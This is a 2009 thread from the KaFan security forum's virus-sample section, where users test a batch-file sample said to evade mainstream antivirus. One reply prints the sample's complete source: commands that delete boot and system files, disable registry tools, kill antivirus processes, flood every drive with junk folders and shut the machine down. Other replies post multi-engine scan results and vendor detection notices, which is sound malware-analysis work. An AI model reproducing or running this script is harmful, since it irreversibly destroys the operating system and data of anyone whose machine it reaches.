查看: 3237|回复: 15
收起左侧

[病毒样本] 过主流病毒

[复制链接]
红黑色
头像被屏蔽
发表于 2009-3-2 14:21:57 | 显示全部楼层 |阅读模式
全过,微点也没反映。

点击运行样本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
红黑色
头像被屏蔽
 楼主| 发表于 2009-3-2 14:27:20 | 显示全部楼层
最好在虚拟机测试吧。
cliffboy
发表于 2009-3-2 14:30:20 | 显示全部楼层
费尔:谁点谁知道.rar>>谁点谁知道.bat        Trojan.BAT.KillFiles.ga.khvv        木马        还未处理

这东西前几天貌似有人发过了。。。
ledled
发表于 2009-3-2 14:37:18 | 显示全部楼层
  1. attrib -r -h -s c:\ntldr
  2. attrib -r -h -s c:\*.sys
  3. del c:\ntldr
  4. del c:\*.sys
  5. @reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
  6. taskkill /f /im MPMon.exe /t
  7. taskkill /f /im MPSVC1.exe/t
  8. taskkill /f /im MPSVC2.exe/t
  9. taskkill /f /im MPSVC.exe/t
  10. attrib -r -h -s C:\windows\*.exe
  11. attrib -r -h -s C:\windows\system32\*.exe
  12. attrib -r -h -s C:\windows\system32\*.cpl
  13. del C:\windows\*.exe
  14. del C:\windows\system32\*.exe
  15. del C:\windows\system32\*.cpl
  16. set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
  17. for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
  18. Shutdown
  19. date 2099-10-10
复制代码

VirusBuster found nothing
红黑色
头像被屏蔽
 楼主| 发表于 2009-3-2 14:42:14 | 显示全部楼层
大家运行之后是什么反映?
jlj383940
发表于 2009-3-2 15:14:55 | 显示全部楼层
文件 _______________.rar 接收于 2009.03.02 08:10:15 (CET)
当前状态:   完成
结果: 7/39 (17.95%)
格式化文本
打印结果  反病毒引擎        版本        最后更新        扫描结果
a-squared        4.0.0.101        2009.03.02        BehavesLike!IK
AhnLab-V3        5.0.0.2        2009.02.27        -
AntiVir        7.9.0.98        2009.03.02        -
Authentium        5.1.0.4        2009.03.01        BAT/DelWin.R
Avast        4.8.1335.0        2009.03.01        -
AVG        8.0.0.237        2009.03.01        -
BitDefender        7.2        2009.03.02        BehavesLike:BAT.Delete
CAT-QuickHeal        10.00        2009.03.02        -
ClamAV        0.94.1        2009.03.02        -
Comodo        986        2009.02.20        -
DrWeb        4.44.0.09170        2009.03.02        -
eSafe        7.0.17.0        2009.02.26        -
eTrust-Vet        31.6.6379        2009.03.02        -
F-Prot        4.4.4.56        2009.03.01        BAT/DelWin.R
F-Secure        8.0.14470.0        2009.03.01        -
Fortinet        3.117.0.0        2009.03.02        -
GData        19        2009.03.02        -
Ikarus        T3.1.1.45.0        2009.03.02        BehavesLike
K7AntiVirus        7.10.649        2009.02.27        -
Kaspersky        7.0.0.125        2009.03.02        -
McAfee        5540        2009.03.01        -
McAfee+Artemis        5540        2009.03.01        -
Microsoft        1.4306        2009.03.02        -
NOD32        3899        2009.03.02        -
Norman        6.00.06        2009.02.27        BAT/Autorun.IWD
nProtect        2009.1.8.0        2009.03.02        -
Panda        10.0.0.10        2009.03.01        -
PCTools        4.4.2.0        2009.03.01        -
Prevx1        V2        2009.03.02        -
Rising        21.19.00.00        2009.03.02        -
SecureWeb-Gateway        6.7.6        2009.03.02        -
Sophos        4.39.0        2009.03.02        -
Sunbelt        3.2.1858.2        2009.02.28        -
Symantec        10        2009.03.02        -
TheHacker        6.3.2.6.268        2009.03.01        Bat/Generic
TrendMicro        8.700.0.1004        2009.03.02        -
VBA32        3.12.10.1        2009.03.01        -
ViRobot        2009.2.28.1629        2009.03.02        -
VirusBuster        4.5.11.0        2009.03.01        -
jlj383940
发表于 2009-3-2 15:22:20 | 显示全部楼层
楼上的:Norman        6.00.06        2009.02.27        BAT/Autorun.IWD
我想FS运行时会调用这引擎,运行这FS就KILL它
夏日的风   你来运行一下,我PC太干净
dl123100
发表于 2009-3-2 17:05:23 | 显示全部楼层
样本来自hips区的老帖
328397663
发表于 2009-3-2 17:10:58 | 显示全部楼层
Filename Result
##########.bat  MALWARE

The file '##########.bat' has been determined to be 'MALWARE'. Our analysts named the threat BAT/Delfiles.AF. The term "BAT/" denotes a virus in a Batch format. Batch file viruses execute commands from the commandline whereby the system can be modified.Detection will be added to our virus definition file (VDF) with one of the next updates.
328397663
发表于 2009-3-2 17:35:56 | 显示全部楼层
Hello,



New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.

评分

参与人数 1人气 +1 收起 理由
sam.to + 1 版区有你更精彩: )

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-23 04:43 , Processed in 0.090623 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表